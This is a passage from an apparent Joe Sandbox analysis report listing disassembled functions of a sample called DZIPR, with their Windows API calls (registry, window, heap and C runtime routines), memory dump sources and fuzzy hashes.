                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FACD0AE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FACD0D1
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FACD0ED
                                          • RegCloseKey.ADVAPI32(?), ref: 6FACD0FD
                                          • RegCloseKey.ADVAPI32(?), ref: 6FACD107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CloseCreate$Open
                                          • String ID: software
                                          • API String ID: 1740278721-2010147023
                                          • Opcode ID: 65baa54e68a1b846ebb39035fa25f0119d42bab37b67964eb55ca4cf0d2a3100
                                          • Instruction ID: 81c54bf89926158069c973d751148e9bbe1f0eb802df27a8b52847fae84d4414
                                          • Opcode Fuzzy Hash: 65baa54e68a1b846ebb39035fa25f0119d42bab37b67964eb55ca4cf0d2a3100
                                          • Instruction Fuzzy Hash: 86112B72D00118BBCB21DB8ACD88CDFBFBDEFC9710B10406AF515A2111D7309A41EB61
                                          Function 6FACBEAE Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBEB5
                                          • __CxxThrowException@8.LIBCMT ref: 6FACBEBF
                                            • Part of subcall function 6FAD527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6FAD52BD
                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FACAF00,6FAC6DDD,6FAC68AD,?,6FAD4902,?), ref: 6FACBED6
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBEE3
                                            • Part of subcall function 6FAC6D89: __CxxThrowException@8.LIBCMT ref: 6FAC6D9F
                                          • _memset.LIBCMT ref: 6FACBF02
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FACBF13
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FACBF34
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                          • String ID:
                                          • API String ID: 356813703-0
                                          • Opcode ID: 6f652f8d32bd5f9b4f97f12c6a507b3aaf3202bc8affe9c877defc30e1573cf5
                                          • Instruction ID: b7d5b3c41df980a11611e0f572eccebbe404e500217b0d4596883585b62b0e8f
                                          • Opcode Fuzzy Hash: 6f652f8d32bd5f9b4f97f12c6a507b3aaf3202bc8affe9c877defc30e1573cf5
                                          • Instruction Fuzzy Hash: 9511A174100705AFDB10EF64CC89C6ABBB9FF05324710C529F65996660CB35ECA1CF91
                                          Function 6FACCA77 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FACCA85
                                          • SetErrorMode.KERNEL32(00000000), ref: 6FACCA8D
                                            • Part of subcall function 6FACA698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FACA6D0
                                            • Part of subcall function 6FACA698: SetLastError.KERNEL32(0000006F), ref: 6FACA6E7
                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FACCADC
                                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FACCAEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                                          • String ID: NotifyWinEvent$user32.dll
                                          • API String ID: 1146408833-597752486
                                          • Opcode ID: 204159a27c7e1e7ce95ecc0c9b1816515d310d517fd0f88c40de29c68ef81a96
                                          • Instruction ID: 449acd0a59f3249cde2aea03001c51730bec9e3a22d648fcc72ae95938c24a4c
                                          • Opcode Fuzzy Hash: 204159a27c7e1e7ce95ecc0c9b1816515d310d517fd0f88c40de29c68ef81a96
                                          • Instruction Fuzzy Hash: 3301A2715143545FCB10EF64DA18A9A3B99EF45324F05805AF949DB291DF38D880DFA3
                                          Function 6FACCD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(0000000F), ref: 6FACCD2E
                                          • GetSysColor.USER32(00000010), ref: 6FACCD35
                                          • GetSysColor.USER32(00000014), ref: 6FACCD3C
                                          • GetSysColor.USER32(00000012), ref: 6FACCD43
                                          • GetSysColor.USER32(00000006), ref: 6FACCD4A
                                          • GetSysColorBrush.USER32(0000000F), ref: 6FACCD57
                                          • GetSysColorBrush.USER32(00000006), ref: 6FACCD5E
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Color$Brush
                                          • String ID:
                                          • API String ID: 2798902688-0
                                          • Opcode ID: 18a9e926392551b791becd5a401baf7cdb67d41ee92ee703d4e888bc007997f0
                                          • Instruction ID: eb38aa43212afe05c272377680212c67a6043d83b58a92cdd4a2941a7e717475
                                          • Opcode Fuzzy Hash: 18a9e926392551b791becd5a401baf7cdb67d41ee92ee703d4e888bc007997f0
                                          • Instruction Fuzzy Hash: D6F012719407445BDB30BF724D09B47BAD1FFC4720F16092EE2458B990D6B6E441DF40
                                          Function 6FAC815A Relevance: 9.1, APIs: 6, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 6FAC818D
                                          • GetParent.USER32(?), ref: 6FAC819B
                                          • GetParent.USER32(?), ref: 6FAC81AE
                                          • GetLastActivePopup.USER32(?), ref: 6FAC81BF
                                          • IsWindowEnabled.USER32(?), ref: 6FAC81D3
                                          • EnableWindow.USER32(?,00000000), ref: 6FAC81E6
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                          • String ID:
                                          • API String ID: 670545878-0
                                          • Opcode ID: 8c615e0ed02b44a53d53d4e257b438ce121f157eb7ba9c84c24a734f969b3051
                                          • Instruction ID: 7874727ee95fb6cea3ff26814e4f4f3386267042b9a07c6311d6a300e8ec7e71
                                          • Opcode Fuzzy Hash: 8c615e0ed02b44a53d53d4e257b438ce121f157eb7ba9c84c24a734f969b3051
                                          • Instruction Fuzzy Hash: 4511A33260DB21ABD7120A698D44B9A77E8BF46F64F0E4126ED14EB240D768E981C6D3
                                          Function 6FADC416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 6FADC43E
                                            • Part of subcall function 6FAD4FC4: __getptd.LIBCMT ref: 6FAD4FD2
                                            • Part of subcall function 6FAD4FC4: __getptd.LIBCMT ref: 6FAD4FE0
                                          • __getptd.LIBCMT ref: 6FADC448
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FADC456
                                          • __getptd.LIBCMT ref: 6FADC464
                                          • __getptd.LIBCMT ref: 6FADC46F
                                          • _CallCatchBlock2.LIBCMT ref: 6FADC495
                                            • Part of subcall function 6FAD5069: __CallSettingFrame@12.LIBCMT ref: 6FAD50B5
                                            • Part of subcall function 6FADC53C: __getptd.LIBCMT ref: 6FADC54B
                                            • Part of subcall function 6FADC53C: __getptd.LIBCMT ref: 6FADC559
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          • Opcode ID: 64f627e1ff63a3206b9e3097a59efc2cdf2cf51cceb3014734118375cbca7216
                                          • Instruction ID: e11c8721704f7c2ebadc2e1f7dcfd2446f0fe2f8566010a0db60e8696dc908fd
                                          • Opcode Fuzzy Hash: 64f627e1ff63a3206b9e3097a59efc2cdf2cf51cceb3014734118375cbca7216
                                          • Instruction Fuzzy Hash: 5111B4B1905309DFDF00DFA4C584A9D7BB1FF18315F108169F814A72A1DB399A919B50
                                          Function 6FACDB5C Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 6FACDB6D
                                          • GetDlgCtrlID.USER32(00000000), ref: 6FACDB81
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FACDB91
                                          • GetWindowRect.USER32(00000000,?), ref: 6FACDBA3
                                          • PtInRect.USER32(?,?,?), ref: 6FACDBB3
                                          • GetWindow.USER32(?,00000005), ref: 6FACDBC0
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                          • String ID:
                                          • API String ID: 1315500227-0
                                          • Opcode ID: a9c6bb15595a824cbb6c43aaead8fd37a67eb84ee6e8e33b601f6f9ddf0b09e1
                                          • Instruction ID: d847402c45b51381a135c203676ecdb4ed4863e17381707c24f4df6cd97f7b2a
                                          • Opcode Fuzzy Hash: a9c6bb15595a824cbb6c43aaead8fd37a67eb84ee6e8e33b601f6f9ddf0b09e1
                                          • Instruction Fuzzy Hash: 6101623214461ABBDF115B54CC08EDE3B6EFF56760F088121F921D6090D738E966DB95
                                          Function 6FAC96DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetMenuCheckMarkDimensions.USER32 ref: 6FAC96F2
                                          • _memset.LIBCMT ref: 6FAC976A
                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FAC97CD
                                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FAC97E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                          • String ID:
                                          • API String ID: 4271682439-3916222277
                                          • Opcode ID: fa035f50e5e3832370af2bf0af9295adc000cb3690a2827915f8e0cfdd7ddc01
                                          • Instruction ID: 3ee89b83aaab78134193da6f22a42809001cbccd04eb8c91eeddfde8719feb2a
                                          • Opcode Fuzzy Hash: fa035f50e5e3832370af2bf0af9295adc000cb3690a2827915f8e0cfdd7ddc01
                                          • Instruction Fuzzy Hash: FC314771A003189FEF108F298DC4B997BB4FB49354F4980A6E548EB2C0DF3499858F51
                                          Function 6FADC165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6FADC17F
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __getptd.LIBCMT ref: 6FADC190
                                          • __getptd.LIBCMT ref: 6FADC19E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$csm
                                          • API String ID: 803148776-1389381023
                                          • Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                          • Instruction ID: 25c72ab9f4300868e9b3ddba124678ecfa568c27f93060a2a8e43f88f379c81a
                                          • Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                                          • Instruction Fuzzy Hash: 35E04F755142088FDB009BB5C185B5837A9EF69718F6901A1F41CCB262DB3DE6C0D982
                                          Function 6FAC5670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,6FAC49D6,?,00000003), ref: 6FAC5685
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FAC56B4
                                          • GetLastError.KERNEL32 ref: 6FAC56C5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FAC56E5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FAC5709
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                          • String ID:
                                          • API String ID: 3322701435-0
                                          • Opcode ID: 70ecb696b4fd685c18bba2101d22d68e139f9b0188340dad410f795ea22b4664
                                          • Instruction ID: 3472c76d8e925d65b1b2390d9f59b5932e1e5237324e1fc05db173acaa323646
                                          • Opcode Fuzzy Hash: 70ecb696b4fd685c18bba2101d22d68e139f9b0188340dad410f795ea22b4664
                                          • Instruction Fuzzy Hash: 1C11AF75384705AFE6209F68CCC4F6777ACEB85714F100D28F6819B2C0D664BC498762
                                          Function 6FACDA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?), ref: 6FACDA3D
                                          • _memset.LIBCMT ref: 6FACDA5B
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FACDA75
                                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FACDA87
                                          • SetWindowTextW.USER32(00000000,?), ref: 6FACDA93
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                          • String ID:
                                          • API String ID: 4273134663-0
                                          • Opcode ID: 70b9b467ba875fffcdaf0959d1f90506b3c0184a8a676982b457a2c5b0692c4c
                                          • Instruction ID: 405bf942d1a406961070d93c52c21ad6107991bba52febe072b039fd6c02f4ad
                                          • Opcode Fuzzy Hash: 70b9b467ba875fffcdaf0959d1f90506b3c0184a8a676982b457a2c5b0692c4c
                                          • Instruction Fuzzy Hash: 7701C4B650571967CB00EB648D889DB73ADEF45310F048466F915D7241DA38D945C7A1
                                          Function 6FADFE0E Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __getptd.LIBCMT ref: 6FADFE1A
                                            • Part of subcall function 6FADA27F: __getptd_noexit.LIBCMT ref: 6FADA282
                                            • Part of subcall function 6FADA27F: __amsg_exit.LIBCMT ref: 6FADA28F
                                          • __amsg_exit.LIBCMT ref: 6FADFE3A
                                          • __lock.LIBCMT ref: 6FADFE4A
                                          • InterlockedDecrement.KERNEL32(?), ref: 6FADFE67
                                          • InterlockedIncrement.KERNEL32(028A1608), ref: 6FADFE92
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 4271482742-0
                                          • Opcode ID: b09e5721fe4fc5d074e634e2bea0fc14c41b13d49d0555df98ed513a89f39496
                                          • Instruction ID: 5f04b500a3f7dcddc1fafad9d099aee5c2f769e62cb77dc0bcd38facf4882120
                                          • Opcode Fuzzy Hash: b09e5721fe4fc5d074e634e2bea0fc14c41b13d49d0555df98ed513a89f39496
                                          • Instruction Fuzzy Hash: 5D014432902B119FDB119F69890479F77A1AF85725F09410DF8106B2D1CB3CB9D2DBD5
                                          Function 6FAD4618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • __lock.LIBCMT ref: 6FAD4636
                                            • Part of subcall function 6FADA914: __mtinitlocknum.LIBCMT ref: 6FADA92A
                                            • Part of subcall function 6FADA914: __amsg_exit.LIBCMT ref: 6FADA936
                                            • Part of subcall function 6FADA914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6FADA93E
                                          • ___sbh_find_block.LIBCMT ref: 6FAD4641
                                          • ___sbh_free_block.LIBCMT ref: 6FAD4650
                                          • HeapFree.KERNEL32(00000000,00000000,6FAEE828,0000000C,6FADA270,00000000,?,6FADA5D4,00000000,00000001,00000000,?,6FADA89E,00000018,6FAEE978,0000000C), ref: 6FAD4680
                                          • GetLastError.KERNEL32(?,6FADA5D4,00000000,00000001,00000000,?,6FADA89E,00000018,6FAEE978,0000000C,6FADA92F,00000000,00000000,?,6FADA32A,0000000D), ref: 6FAD4691
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 2714421763-0
                                          • Opcode ID: 3cbb8af821bec884c0f8c84174cedd7bc070f518b8f12347d320cdc91e09f6f5
                                          • Instruction ID: f652537c4b041bba08cb3b66c55d538845f869035ec52df1ba9a2a8c490492fc
                                          • Opcode Fuzzy Hash: 3cbb8af821bec884c0f8c84174cedd7bc070f518b8f12347d320cdc91e09f6f5
                                          • Instruction Fuzzy Hash: D301D631805B11AFEF205F789A0974D3B65EF0133AF244109F811AA0C0CB7CE5C0DB98
                                          Function 6FACC113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • TlsFree.KERNEL32(?,?,?,6FACC179), ref: 6FACC13B
                                          • GlobalHandle.KERNEL32(?), ref: 6FACC149
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FACC152
                                          • GlobalFree.KERNEL32(00000000), ref: 6FACC159
                                          • RtlDeleteCriticalSection.NTDLL ref: 6FACC163
                                            • Part of subcall function 6FACBF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6FACBFBC
                                            • Part of subcall function 6FACBF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6FACBFCC
                                            • Part of subcall function 6FACBF5D: LocalFree.KERNEL32(?), ref: 6FACBFD5
                                            • Part of subcall function 6FACBF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FACBFE7
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000017.00000002.2588804516.000000006FAF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_23_2_6fac0000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                          • String ID:
                                          • API String ID: 1549993015-0
                                          • Opcode ID: e6f7db07b1eac7b8ea19f9ec36a93e98c34e48c3a173f77704712df743c7a678
                                          • Instruction ID: efc45c7fcc5399dbb525b612ed2f795dfafc67919e422708b9570fc7d2cfdb35
                                          • Opcode Fuzzy Hash: e6f7db07b1eac7b8ea19f9ec36a93e98c34e48c3a173f77704712df743c7a678
                                          • Instruction Fuzzy Hash: EAF0E232204B009BCB109B3D9D0CE9B37B9AF86A703194208F425D3280CB38E84397B1
                                          Function 6FAD140F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6FACC220: RtlEnterCriticalSection.NTDLL(6FAF34A8), ref: 6FACC25A
                                            • Part of subcall function 6FACC220: RtlInitializeCriticalSection.NTDLL(?), ref: 6FACC26C
                                            • Part of subcall function 6FACC220: RtlLeaveCriticalSection.NTDLL(6FAF34A8), ref: 6FACC279
                                            • Part of subcall function 6FACC220: RtlEnterCriticalSection.NTDLL(?), ref: 6FACC289
                                            • Part of subcall function 6FACBB0C: __EH_prolog3_catch.LIBCMT ref: 6FACBB13
                                            • Part of subcall function 6FAC6DC1: __CxxThrowException@8.LIBCMT ref: 6FAC6DD7
                                            • Part of subcall function 6FAC6DC1: __EH_prolog3.LIBCMT ref: 6FAC6DE4
                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FAD1458
                                          • FreeLibrary.KERNEL32(?), ref: 6FAD1468
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.2588653637.000000006FAC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FAC0000, based on PE: true
                                          • Associated: 00000017.00000002.2588635705.000000006FAC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
